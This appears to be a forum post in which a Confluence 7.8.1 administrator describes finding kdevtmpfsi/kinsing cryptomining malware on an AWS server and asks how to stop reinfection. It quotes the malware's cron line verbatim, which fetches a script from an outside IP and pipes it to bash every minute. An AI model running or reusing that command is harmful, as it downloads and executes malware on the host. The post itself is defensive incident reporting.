We are running Confluence 7.8..1 in AWS. This morning Amazon sent us a notice that our server was implicated in activity that resembles a Denial of Service attack. While investigation we say that an lot of entries in the logs for an anonymous user trying to access /rest/tinymce/1/macro/preview. We searched Confluence support and found a ticket that mentioned being hacked by malware. From that and other sources we found that we had mining malware installed on our server. We killed the kdevtmpfsi and kinsing processes that were running under the confluence user. We found a cronjob for confluence that had the following:
* * * * * curl http://195.3.146.118/cf.sh | bash > /dev/null 2>&1
We found the mining files in our /tmp directory along with udp, syna, main, libsystem.so, gates.lod and conf.n. We deleted the files and then created read-only files so they could not be created again.
In the support ticket we found, https://community.atlassian.com/t5/Confluence-questions/How-come-my-confluence-installation-was-hacked-by-Kerberods/qaq-p/1054605, this issue was fixed after 6.9.1. How do we have the issue with 7.8.1? We have changed our load balancer to only allow access from our network for now. What can we do to make sure this doesn't happen again when we open it back up?